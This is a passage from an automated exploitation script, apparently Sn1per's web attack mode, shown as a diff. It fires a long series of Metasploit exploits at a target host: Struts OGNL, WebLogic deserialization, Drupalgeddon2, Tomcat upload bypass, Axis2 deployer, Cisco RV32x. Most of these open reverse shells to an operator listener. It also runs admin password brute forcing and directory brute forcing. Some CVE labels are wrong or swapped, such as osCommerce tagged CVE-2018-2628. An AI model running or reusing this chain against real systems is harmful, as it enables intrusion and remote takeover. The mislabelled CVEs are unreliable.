sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING AXIS2 ADMIN BRUTE FORCE SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/axis_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg USERNAME admin; setg PASS_FILE "$PASS_FILE"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING AXIS2 AUTHENTICATED DEPLOYER RCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use multi/http/axis2_deployer; setg RHOSTS "$TARGET"; set FingerprintCheck false; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING DRUPAL REST UNSERIALIZE CVE-2019-6340 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use unix/webapp/drupal_restws_unserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JAVA RMI SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/scanner/misc/java_rmi_server; setg RHOSTS \"$TARGET\"; set RPORT \"$PORT\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PULSE SECURE VPN ARBITRARY FILE DISCLOSURE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use gather/pulse_secure_file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING CITRIX GATEWAY ARBITRARY CODE EXECUTION VULNERABILITY CVE-2019-19781 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -vk --path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep "You don’t have permission to access /vpns/" >/dev/null && echo "VULNERABLE: $TARGET" | tee $LOOT_DIR/output/cve-2019-19781-$TARGET-port$PORT.txt || echo "MITIGATED: $TARGET" | tee $LOOT_DIR/output/cve-2019-19781-$TARGET-port$PORT.txt
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING RAILS FILE EXPOSURE EXPLOIT CVE-2019-5418 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/gather/rails_doubletap_file_read; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING CISCO RV320 AND RV325 UNAUTHENTICATED RCE EXPLOIT CVE-2019-1653 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/linux/http/cisco_rv32x_rce; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw 2> /dev/null
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per webpwn scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per webpwn scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-scan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-scan.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
fi
|
||||
|
||||
|
|
@ -83,9 +83,9 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R -X OPTIONS http://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R --insecure http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L --insecure http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R --insecure -X OPTIONS http://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -178,6 +178,12 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$GUA" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING GUA URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
gua2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$BLACKWIDOW" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
|
|
@ -190,6 +196,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
|
||||
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
|
|
@ -208,8 +215,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_STEALTH -x 400,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
